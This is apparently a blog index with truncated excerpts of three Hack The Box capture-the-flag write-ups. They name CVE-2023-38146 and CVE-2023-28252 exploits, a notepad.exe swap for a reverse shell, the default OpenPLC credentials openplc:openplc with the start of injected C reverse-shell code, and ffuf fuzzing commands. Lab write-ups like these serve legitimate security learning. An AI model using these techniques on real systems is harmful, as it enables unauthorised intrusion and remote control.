User flag Aero.htb Use my implementation of CVE-2023-38146 to generate a malicious Windows 11 theme and upload it to the machine. This should get you the user shell. Root flag After looking around for stuff on the machine, I found a PDF file in the C:/Users/sam.emerson/Documents folder that says something about CVE-2023-28252. 📄 So, I compiled it and replaced notepad.exe with a reverse shell executable, compiled it using Visual Studio and gained the system shell....
User flag The only interesting thing is running on port 8080: http://10.129.175.20:8080/. OpenPLC which uses default credentials openplc:openplc. To exploit this thing, navigate to the Hardware tab and append the following C code to the Hardware Layer Code Box: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 #include <stdio.h> #include <sys/socket.h> #include <sys/types....
User flag Analysis.htb I started by enumerating the VHosts on the webserver as there was no obvious vulnerability on the website: 1 ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb" The only result should be internal.analysis.htb so let’s fuzz more: 1 ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/FUZZ After extensive fuzzing, I discovered a PHP file which is interesting: 1 ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/users/FUZZ.php By now, we have a file named list....